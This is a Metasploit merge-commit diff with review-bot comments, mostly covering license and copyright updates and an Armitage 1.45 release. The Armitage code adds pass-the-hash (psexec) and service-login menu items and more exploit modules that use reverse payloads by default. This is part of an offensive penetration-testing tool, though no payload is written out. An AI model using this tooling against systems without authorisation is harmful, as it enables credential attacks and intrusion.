Merge remote-tracking branch 'upstream/master' into web-modules

unstable
Tasos Laskos 2013-01-04 21:33:17 +02:00
commit e1885cab0b
1670 changed files with 5809 additions and 8957 deletions

.gitignore

@ -22,3 +22,4 @@ tags
*.swp
*.orig
*.rej
*~


@ -12,6 +12,11 @@ If your bug is new and you'd like to report it you will need to
first](https://dev.metasploit.com/redmine/account/register). Don't
worry, it's easy and fun and takes about 30 seconds.
When you file a bug report, please inclue your **steps to reproduce**,
full copy-pastes of Ruby stack traces, and any relevant details about
your environment. Without repro steps, your bug will likely be closed.
With repro steps, your bugs will likely be fixed.
## Contributing Metasploit Modules
If you have an exploit that you'd like to contribute to the Metasploit
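Review bot: typo in the first added sentence, "please inclue your **steps to reproduce**" should read "include". The last two added sentences also switch between "your bug" and "your bugs"; pick one form.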


@ -1,4 +1,4 @@
Copyright (C) 2006-2012, Rapid7 Inc.
Copyright (C) 2006-2013, Rapid7 Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,


@ -18,13 +18,17 @@ Ruby
Copyright (c) 2004 David R. Halliday
- The Zip library located under lib/zip.
Copyright (C) 2002-2004 Thomas Sondergaard
- FastLib located at lib/fastlib.rb
Copyright (C) 2011 Rapid7
- Gem components located under lib/gemcache/
* mime-types - Copyright (C) Austin Ziegler
* rdoc - RDoc is Copyright (c) 2001-2003 Dave Thomas, The Pragmatic Programmers.
Portions (c) 2007-2011 Eric Hodel. Portions copyright others, see individual
files for details.
* eventmachine - Copyright (C) 2006-07 by Francis Cianfrocca
* json - Copyright Daniel Luz <dev at mernen dot com>
* pg - Copyright (c) 1997-2012 by the authors
* thin - Copyright (c) Marc-Andre Cournoyer
@ -85,42 +89,6 @@ Ruby
````
PacketFu
========
- The PacketFu library located under lib/packetfu.
Copyright (c) 2008-2012, Tod Beardsley
````
Copyright (c) 2008-2012, Tod Beardsley
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Tod Beardsley nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
````
GPL
===
- The modified TightVNC binaries and their associated source code.
@ -1016,39 +984,55 @@ OpenSSL License
MIT
===
- The SSHKey library located under lib/sshkey.
- The SSHKey library located under lib/sshkey/
Copyright (c) 2011 James Miller
- The Net::SSH library located under lib/net/ssh.
- The Net::SSH library located under lib/net/ssh/
Copyright (c) 2008 Jamis Buck <jamis@37signals.com>
- Anemone located under lib/anemone
- Anemone located under lib/anemone/
Copyright (c) 2009 Vertive, Inc.
- RKelly located under lib/rkelly/
Copyright (c) 2007, 2008, 2009 Aaron Patterson, John Barnette
- Gem components located under lib/gemcache
- Gem components located under lib/gemcache/
* actionmailer - Copyright (c) 2004-2011 David Heinemeier Hansson
* actionpack - Copyright (c) 2004-2011 David Heinemeier Hansson
* activemodel - Copyright (c) 2004-2011 David Heinemeier Hansson
* activerecord - Copyright (c) 2004-2011 David Heinemeier Hansson
* activeresource - Copyright (c) 2006-2011 David Heinemeier Hansson
* activesupport - Copyright (c) 2005-2011 David Heinemeier Hansson
* acts_as_list - Copyright (c) 2007 David Heinemeier Hansson
* arel- Copyright (c) 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
* authlogic - Copyright (c) 2011 Ben Johnson of Binary Logic
* builder - Copyright (c) 2003-2012 Jim Weirich (jim.weirich@gmail.com)
* carrierwave - Copyright (c) 2008-2012 Jonas Nicklas
* chunky_png - Copyright (c) 2010 Willem van Bergen
* coderay - By Rob Aldred
* daemons - Copyright (c) 2005-2012 Thomas Uehlinger
* diff-lcs - Copyright 20042011 Austin Ziegler
* diff-lcs - Copyright 2004-2011 Austin Ziegler
* erubis - copyright(c) 2006-2011 kuwata-lab.com all rights reserved.
* formtastic - Copyright (c) 2008-2010 Justin French
* fssm - Copyright (c) 2011 Travis Tilley
* hike - Copyright (c) 2011 Sam Stephenson
* i18n - Copyright (c) 2008 The Ruby I18n team
* ice_cube - Copyright (c) 2010-2012 John Crepezzi
* journey - Copyright (c) 2011 Aaron Patterson
* jquery-rails - Copyright (c) 2010 Andre Arko
* liquid - Copyright (c) 2005, 2006 Tobias Luetke
* mail - Copyright (c) 2009, 2010, 2011, 2012 Mikel Lindsaar
* metasploit_data_models - Copyright (c) 2012, Rapid7, Inc.
* method_source - Copyright (c) 2011 John Mair (banisterfiend)
* multi_json - Copyright (c) 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
* nokogiri - Copyright (c) 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
* polyglot - Copyright (c) 2007 Clifford Heath
* prototype_legacy_helper - No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
* rack - Copyright (c) 2007, 2008, 2009, 2010 Christian Neukirchen <purl.org/net/chneukirchen>
* rack-cache - Copyright (c) 2008 Ryan Tomayko <http://tomayko.com/about>
* rack-ssl - Copyright (c) 2010 Joshua Peek
* rack-test - Copyright (c) 2008-2009 Bryan Helmkamp, Engine Yard Inc.
* railties - No copyright statement provided
* rake - Copyright (c) 2003, 2004 Jim Weirich
* robots - Copyright (c) 2008 Kyle Maxwell, contributors
* slop - Copyright (c) 2012 Lee Jarvis
* spork - Copyright (c) 2009 Tim Harper
* sprockets - Copyright (c) 2011 Sam Stephenson, Copyright (c) 2011 Joshua Peek
* state_machine - Copyright (c) 2006-2012 Aaron Pfeifer
* thor - Copyright (c) 2008 Yehuda Katz
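Review bot: two entries in the lib/gemcache/ list break the "name - Copyright (c) years holder" pattern the rest of the list follows: "arel- Copyright" is missing the space before the dash, and "coderay - By Rob Aldred" carries no copyright statement or year. For coderay, either quote the notice shipped with the gem or mark it "No copyright statement provided" as is done for railties.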
@ -1081,3 +1065,409 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
````
3-Clause BSD
============
- The PacketFu library located under lib/packetfu/
Copyright (c) 2008-2012, Tod Beardsley
- The Kiss FFT library located under external/ruby-kissfft/
Copyright (c) 2003-2010 Mark Borgerding
- The Kiss FFT wrapper layer, located under external/ruby-kissfft/
Copyright (C) 2009-2012 H D Moore < hdm[at]rapid7.com >
- Armitage, located under external/source/armitage and data/armitage/
Copyright (C) 2010-2012 Raphael Mudge
````
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Tod Beardsley nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
````
Artistic 2.0
============
- Gem components located under lib/gemcache/
* win32-api - Copyright (c) 2003-2011, Daniel J. Berger
* win32-service - Copyright (c) 2003-2011, Daniel J. Berger
* windows-api - Copyright (c) 2003-2011, Daniel J. Berger
* windows-pr - Copyright (c) 2003-2011, Daniel J. Berger
````
Artistic License 2.0 Copyright (c) 2000-2006, The Perl Foundation.
Everyone is permitted to copy and distribute verbatim copies of this license
document, but changing it is not allowed.
Preamble This license establishes the terms under which a given free software
Package may be copied, modified, distributed, and/or redistributed. The intent
is that the Copyright Holder maintains some artistic control over the
development of that Package while still keeping the Package available as open
source and free software.
You are always permitted to make arrangements wholly outside of this license
directly with the Copyright Holder of a given Package. If the terms of this
license do not permit the full use that you propose to make of the Package, you
should contact the Copyright Holder and seek a different licensing arrangement.
Definitions "Copyright Holder" means the individual(s) or organization(s) named
in the copyright notice for the entire Package.
"Contributor" means any party that has contributed code or other material to
the Package, in accordance with the Copyright Holder's procedures.
"You" and "your" means any person who would like to copy, distribute, or modify
the Package.
"Package" means the collection of files distributed by the Copyright Holder,
and derivatives of that collection and/or of those files. A given Package may
consist of either the Standard Version, or a Modified Version.
"Distribute" means providing a copy of the Package or making it accessible to
anyone else, or in the case of a company or organization, to others outside of
your company or organization.
"Distributor Fee" means any fee that you charge for Distributing this Package
or providing support for this Package to another party. It does not mean
licensing fees.
"Standard Version" refers to the Package if it has not been modified, or has
been modified only in ways explicitly requested by the Copyright Holder.
"Modified Version" means the Package, if it has been changed, and such changes
were not explicitly requested by the Copyright Holder.
"Original License" means this Artistic License as Distributed with the Standard
Version of the Package, in its current version or as it may be modified by The
Perl Foundation in the future.
"Source" form means the source code, documentation source, and configuration
files for the Package.
"Compiled" form means the compiled bytecode, object code, binary, or any other
form resulting from mechanical transformation or translation of the Source
form.
Permission for Use and Modification Without Distribution (1) You are permitted
to use the Standard Version and create and use Modified Versions for any
purpose without restriction, provided that you do not Distribute the Modified
Version.
Permissions for Redistribution of the Standard Version (2) You may Distribute
verbatim copies of the Source form of the Standard Version of this Package in
any medium without restriction, either gratis or for a Distributor Fee,
provided that you duplicate all of the original copyright notices and
associated disclaimers. At your discretion, such verbatim copies may or may not
include a Compiled form of the Package.
(3) You may apply any bug fixes, portability changes, and other modifications
made available from the Copyright Holder. The resulting Package will still be
considered the Standard Version, and as such will be subject to the Original
License.
Distribution of Modified Versions of the Package as Source (4) You may
Distribute your Modified Version as Source (either gratis or for a Distributor
Fee, and with or without a Compiled form of the Modified Version) provided that
you clearly document how it differs from the Standard Version, including, but
not limited to, documenting any non-standard features, executables, or modules,
and provided that you do at least ONE of the following:
(a) make the Modified Version available to the Copyright Holder of the Standard
Version, under the Original License, so that the Copyright Holder may include
your modifications in the Standard Version. (b) ensure that installation of
your Modified Version does not prevent the user installing or running the
Standard Version. In addition, the Modified Version must bear a name that is
different from the name of the Standard Version. (c) allow anyone who receives
a copy of the Modified Version to make the Source form of the Modified Version
available to others under (i) the Original License or (ii) a license that
permits the licensee to freely copy, modify and redistribute the Modified
Version using the same licensing terms that apply to the copy that the licensee
received, and requires that the Source form of the Modified Version, and of any
works derived from it, be made freely available in that license fees are
prohibited but Distributor Fees are allowed.
Distribution of Compiled Forms of the Standard Version or Modified Versions
without the Source (5) You may Distribute Compiled forms of the Standard
Version without the Source, provided that you include complete instructions on
how to get the Source of the Standard Version. Such instructions must be valid
at the time of your distribution. If these instructions, at any time while you
are carrying out such distribution, become invalid, you must provide new
instructions on demand or cease further distribution. If you provide valid
instructions or cease distribution within thirty days after you become aware
that the instructions are invalid, then you do not forfeit any of your rights
under this license.
(6) You may Distribute a Modified Version in Compiled form without the Source,
provided that you comply with Section 4 with respect to the Source of the
Modified Version.
Aggregating or Linking the Package (7) You may aggregate the Package (either
the Standard Version or Modified Version) with other packages and Distribute
the resulting aggregation provided that you do not charge a licensing fee for
the Package. Distributor Fees are permitted, and licensing fees for other
components in the aggregation are permitted. The terms of this license apply to
the use and Distribution of the Standard or Modified Versions as included in
the aggregation.
(8) You are permitted to link Modified and Standard Versions with other works,
to embed the Package in a larger work of your own, or to build stand-alone
binary or bytecode versions of applications that include the Package, and
Distribute the result without restriction, provided the result does not expose
a direct interface to the Package.
Items That are Not Considered Part of a Modified Version (9) Works (including,
but not limited to, modules and scripts) that merely extend or make use of the
Package, do not, by themselves, cause the Package to be a Modified Version. In
addition, such works are not considered parts of the Package itself, and are
not subject to the terms of this license.
General Provisions (10) Any use, modification, and distribution of the Standard
or Modified Versions is governed by this Artistic License. By using, modifying
or distributing the Package, you accept this license. Do not use, modify, or
distribute the Package, if you do not accept this license.
(11) If your Modified Version has been derived from a Modified Version made by
someone other than you, you are nevertheless required to ensure that your
Modified Version complies with the requirements of this license.
(12) This license does not grant you the right to use any trademark, service
mark, tradename, or logo of the Copyright Holder.
(13) This license includes the non-exclusive, worldwide, free-of-charge patent
license to make, have made, use, offer to sell, sell, import and otherwise
transfer the Package with respect to any patent claims licensable by the
Copyright Holder that are necessarily infringed by the Package. If you
institute patent litigation (including a cross-claim or counterclaim) against
any party alleging that the Package constitutes direct or contributory patent
infringement, then this Artistic License to you shall terminate on the date
that such litigation is filed.
(14) Disclaimer of Warranty: THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER
AND CONTRIBUTORS "AS IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE
IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR
NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL LAW.
UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY
OUT OF THE USE OF THE PACKAGE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
````
Apache 2.0
==========
- Gem components located under lib/gemcache/
* Msgpack - Copyright (c) 2008-2010 FURUHASHI Sadayuki
````
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction, and
distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by the copyright
owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all other entities
that control, are controlled by, or are under common control with that entity.
For the purposes of this definition, "control" means (i) the power, direct or
indirect, to cause the direction or management of such entity, whether by
contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity exercising
permissions granted by this License.
"Source" form shall mean the preferred form for making modifications, including
but not limited to software source code, documentation source, and
configuration files.
"Object" form shall mean any form resulting from mechanical transformation or
translation of a Source form, including but not limited to compiled object
code, generated documentation, and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or Object form,
made available under the License, as indicated by a copyright notice that is
included in or attached to the work (an example is provided in the Appendix
below).
"Derivative Works" shall mean any work, whether in Source or Object form, that
is based on (or derived from) the Work and for which the editorial revisions,
annotations, elaborations, or other modifications represent, as a whole, an
original work of authorship. For the purposes of this License, Derivative Works
shall not include works that remain separable from, or merely link (or bind by
name) to the interfaces of, the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including the original
version of the Work and any modifications or additions to that Work or
Derivative Works thereof, that is intentionally submitted to Licensor for
inclusion in the Work by the copyright owner or by an individual or Legal
Entity authorized to submit on behalf of the copyright owner. For the purposes
of this definition, "submitted" means any form of electronic, verbal, or
written communication sent to the Licensor or its representatives, including
but not limited to communication on electronic mailing lists, source code
control systems, and issue tracking systems that are managed by, or on behalf
of, the Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise designated in
writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity on behalf
of whom a Contribution has been received by Licensor and subsequently
incorporated within the Work.
2. Grant of Copyright License.
Subject to the terms and conditions of this License, each Contributor hereby
grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,
irrevocable copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the Work and
such Derivative Works in Source or Object form.
3. Grant of Patent License.
Subject to the terms and conditions of this License, each Contributor hereby
grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,
irrevocable (except as stated in this section) patent license to make, have
made, use, offer to sell, sell, import, and otherwise transfer the Work, where
such license applies only to those patent claims licensable by such Contributor
that are necessarily infringed by their Contribution(s) alone or by combination
of their Contribution(s) with the Work to which such Contribution(s) was
submitted. If You institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work or a
Contribution incorporated within the Work constitutes direct or contributory
patent infringement, then any patent licenses granted to You under this License
for that Work shall terminate as of the date such litigation is filed.
4. Redistribution.
You may reproduce and distribute copies of the Work or Derivative Works thereof
in any medium, with or without modifications, and in Source or Object form,
provided that You meet the following conditions:
You must give any other recipients of the Work or Derivative Works a copy of
this License; and You must cause any modified files to carry prominent notices
stating that You changed the files; and You must retain, in the Source form of
any Derivative Works that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work, excluding those notices
that do not pertain to any part of the Derivative Works; and If the Work
includes a "NOTICE" text file as part of its distribution, then any Derivative
Works that You distribute must include a readable copy of the attribution
notices contained within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one of the following
places: within a NOTICE text file distributed as part of the Derivative Works;
within the Source form or documentation, if provided along with the Derivative
Works; or, within a display generated by the Derivative Works, if and wherever
such third-party notices normally appear. The contents of the NOTICE file are
for informational purposes only and do not modify the License. You may add Your
own attribution notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided that such
additional attribution notices cannot be construed as modifying the License.
You may add Your own copyright statement to Your modifications and may provide
additional or different license terms and conditions for use, reproduction, or
distribution of Your modifications, or for any such Derivative Works as a
whole, provided Your use, reproduction, and distribution of the Work otherwise
complies with the conditions stated in this License.
5. Submission of Contributions.
Unless You explicitly state otherwise, any Contribution intentionally submitted
for inclusion in the Work by You to the Licensor shall be under the terms and
conditions of this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify the terms
of any separate license agreement you may have executed with Licensor regarding
such Contributions.
6. Trademarks.
This License does not grant permission to use the trade names, trademarks,
service marks, or product names of the Licensor, except as required for
reasonable and customary use in describing the origin of the Work and
reproducing the content of the NOTICE file.
7. Disclaimer of Warranty.
Unless required by applicable law or agreed to in writing, Licensor provides
the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied,
including, without limitation, any warranties or conditions of TITLE,
NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are
solely responsible for determining the appropriateness of using or
redistributing the Work and assume any risks associated with Your exercise of
permissions under this License.
8. Limitation of Liability.
In no event and under no legal theory, whether in tort (including negligence),
contract, or otherwise, unless required by applicable law (such as deliberate
and grossly negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special, incidental,
or consequential damages of any character arising as a result of this License
or out of the use or inability to use the Work (including but not limited to
damages for loss of goodwill, work stoppage, computer failure or malfunction,
or any and all other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability.
While redistributing the Work or Derivative Works thereof, You may choose to
offer, and charge a fee for, acceptance of support, warranty, indemnity, or
other liability obligations and/or rights consistent with this License.
However, in accepting such obligations, You may act only on Your own behalf and
on Your sole responsibility, not on behalf of any other Contributor, and only
if You agree to indemnify, defend, and hold each Contributor harmless for any
liability incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work
To apply the Apache License to your work, attach the following boilerplate
notice, with the fields enclosed by brackets "[]" replaced with your own
identifying information. (Don't include the brackets!) The text should be
enclosed in the appropriate comment syntax for the file format. We also
recommend that a file or class name and description of purpose be included on
the same "printed page" as the copyright notice for easier identification
within third-party archives.
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License"); you may not
use this file except in compliance with the License. You may obtain a copy of
the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.
````
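Review bot: the 3-Clause BSD text now sits under a heading that covers PacketFu, Kiss FFT, the Kiss FFT wrapper layer and Armitage, but clause 3 and the disclaimer still name a single holder ("Neither the name of Tod Beardsley", "PROVIDED BY TOD BEARDSLEY", "SHALL TOD BEARDSLEY BE LIABLE"). As written, the non-endorsement clause and the warranty disclaimer do not read as covering Mark Borgerding, H D Moore or Raphael Mudge. Use the generic "the copyright holder" wording in the shared text, or keep a separate license block per component.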

Binary file not shown.

Binary file not shown.


@ -60,7 +60,7 @@ sure you peruse the FAQ and Manual first.
7. License
-------
(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license.
(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license.
See section 8 for more information.
lib/jgraphx.jar is used here within the terms of the BSD license offered by


@ -1,6 +1,24 @@
Armitage Changelog
==================
4 Jan 13 (tested against msf 16252)
--------
- Added a helper to set REXE option
- Added an icon to represent Windows 8
- [host] -> Login menu is now built using open services for all
highlighted hosts, not just the first one.
- [host] -> Login items now escape punctuation characters in passwords
before passing them to a framework module.
- Added the windows and linux postgres_payload exploits to the use a
reverse payload by default list.
- Small tweak to allow Armitage to work with Metasploit 4.5 installed
environment on Windows.
Cortana Updates (for scripters)
--------
- &credential_add and &credential_delete no longer break when a
password has creative punctuation in it.
26 Nov 12 (tested against msf 16114)
---------
- Windows command shell tab is now friendlier to commands that prompt
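Review bot: the entry "Added the windows and linux postgres_payload exploits to the use a reverse payload by default list" is hard to parse; something like "Added the windows and linux postgres_payload exploits to the list of modules that use a reverse payload by default" reads cleanly. The "--------" underlines under the new date heading and under "Cortana Updates (for scripters)" also do not match the length used for the 26 Nov 12 entry.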


@ -9,7 +9,9 @@ puts "\n[*] Running checks for netifaces code added by metasploit project"
puts "-----------------------------------------------------------------"
#uncoment to force ioctl on non windows systems
#@force_ioctl = true
@supported_archs = ["i386-mingw32", "i486-linux", "universal-darwin10.0", "i386-openbsd4.8","i386-freebsd8","arm-linux-eabi"]
@supported_archs = [ "i386-mingw32", "i486-linux", "x86_64-linux",
"universal-darwin10.0", "i386-openbsd4.8", "i386-freebsd8",
"arm-linux-eabi" ]
#arm-linux-eabi tested on maemo5 / N900
puts "[*] Warning : this platform as not been tested" unless @supported_archs.include? RUBY_PLATFORM
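Review bot: `@supported_archs.include? RUBY_PLATFORM` is an exact string match, so adding "x86_64-linux" silences the warning for that one string only, while entries such as "universal-darwin10.0", "i386-openbsd4.8" and "i386-freebsd8" pin an OS version and every other release still prints the warning. Consider matching on the OS and architecture part with a pattern instead of growing the list. While this block is being touched, the message "this platform as not been tested" should read "has", and the comment "#uncoment" is misspelled.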


@ -60,7 +60,7 @@ sure you peruse the FAQ and Manual first.
7. License
-------
(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license.
(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license.
See section 8 for more information.
lib/jgraphx.jar is used here within the terms of the BSD license offered by


@ -1,9 +1,9 @@
<html>
<body>
<center><h1>Armitage 1.44</h1></center>
<center><h1>Armitage 1.45</h1></center>
<p>An attack management tool for Metasploit&reg;
<br />Release: 26 Nov 12</p>
<br />Release: 4 Jan 13</p>
<br />
<p>Developed by:</p>

Binary file not shown.


@ -243,14 +243,18 @@ sub session_exploit {
# credentials API
#
sub _fix_pass {
return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1');
}
# credential_add("host", "port", "user, "pass", "type")
sub credential_add {
cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P $4");
cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P " . _fix_pass($4));
}
# credential_delete("host", port, "user", "pass");
sub credential_delete {
cmd_safe("creds -a $1 -p $2 -u $3 -P $4 -d");
cmd_safe("creds -a $1 -p $2 -u $3 -P " . _fix_pass($4) . " -d");
}
sub credential_list {
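Review bot: only the password ($4) goes through `_fix_pass`; host, port, user and type ($1, $2, $3, $5) are still interpolated into the `creds` command string as-is in both `credential_add` and `credential_delete`, and a username can contain the same punctuation that broke passwords. Apply the same escaping to $3 at least. Also check the backslash case: `\p{Punct}` includes the backslash, so a backslash is handled by the `strrep` and then again by the `replace`; a test with a password containing a single backslash would confirm it is not escaped twice. The doc comment above `credential_add` is missing the closing quote after "user".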


@ -59,6 +59,9 @@ sub showHost {
else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) {
push(@overlay, 'resources/windowsxp.png');
}
else if ("*8*" iswm $match) {
push(@overlay, 'resources/windows8.png');
}
else {
push(@overlay, 'resources/windows7.png');
}
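Review bot: the new `"*8*" iswm $match` test matches any OS string that contains the digit 8, not only Windows 8, so a value such as "Windows Server 2008" or "Windows 98" lands in this branch and gets windows8.png unless a branch above the visible context catches it first. Narrow the pattern so the 8 has to stand as its own token, or move the test after the more specific checks.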


@ -22,7 +22,7 @@ setMissPolicy(%results2, { return @(); });
# %exploits is populated in menus.sl when the client-side attacks menu is constructed
# a list of exploits that should always use a reverse shell... this list needs to grow.
@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php");
@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php", "windows/postgres/postgres_payload", "linux/postgres/postgres_payload");
#
# generate menus for a given OS
@ -599,26 +599,28 @@ sub host_attack_items {
}
}
local('$service $name @options $a $port $foo');
local('$name %options $a $port $host $service');
%options = ohash();
foreach $port => $service (%hosts[$2[0]]['services']) {
$name = $service['name'];
if ($port == 445 && "*Windows*" iswm getHostOS($2[0])) {
push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2)));
}
else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) {
push(@options, @($name, lambda(&show_login_dialog, \$service, $hosts => $2)));
}
else if ($name eq "microsoft-ds") {
push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2)));
foreach $host ($2) {
foreach $port => $service (%hosts[$host]['services']) {
$name = $service['name'];
if ($port == 445 && "*Windows*" iswm getHostOS($host)) {
%options["psexec"] = lambda(&pass_the_hash, $hosts => $2);
}
else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) {
%options[$name] = lambda(&show_login_dialog, \$service, $hosts => $2);
}
else if ($name eq "microsoft-ds") {
%options["psexec"] = lambda(&pass_the_hash, $hosts => $2);
}
}
}
if (size(@options) > 0) {
if (size(%options) > 0) {
$a = menu($1, 'Login', 'L');
foreach $service (@options) {
($name, $foo) = $service;
item($a, $name, $null, $foo);
foreach $name (sorta(keys(%options))) {
item($a, $name, $null, %options[$name]);
}
}
}
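Review bot: `%options[$name]` is overwritten on every host, so the `\$service` captured by `lambda(&show_login_dialog, \$service, $hosts => $2)` is the one from whichever highlighted host was visited last, while `$hosts => $2` hands the dialog every highlighted host, including hosts that do not run that service or run it on another port. Collect, per `$name`, only the hosts that actually expose the service and pass that list as `$hosts`, or state in a comment that the dialog is expected to cope with the mismatch. The same applies to the `psexec` entry, which is added for the whole selection as soon as one host qualifies.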
@ -678,6 +680,7 @@ sub addFileListener {
$actions["SigningKey"] = $actions["*FILE*"];
$actions["Wordlist"] = $actions["*FILE*"];
$actions["WORDLIST"] = $actions["*FILE*"];
$actions["REXE"] = $actions["*FILE*"];
# set up an action to choose a session
$actions["SESSION"] = lambda(&chooseSession);

View File

@ -52,6 +52,7 @@ sub host_selected_items {
item($i, '1. 95/98/2000', '1', setHostValueFunction($2, "os_name", "Micosoft Windows", "os_flavor", "2000"));
item($i, '2. XP/2003', '2', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "XP"));
item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista"));
item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8"));
item($h, "Remove Host", 'R', clearHostFunction($2));
}
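Review bot: The new `4. 8/RT` item sets `os_name` to "Microsoft Windows", but the `1. 95/98/2000` item three lines above still sets "Micosoft Windows" (missing "r"), so hosts labelled through that entry end up with a different `os_name` from the other three. Fix the spelling in the same change while the line is in view.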

View File

@ -41,6 +41,7 @@ import ui.*;
# strip any funky characters that will cause this call to throw an exception
$user = replace($user, '\P{Graph}', "");
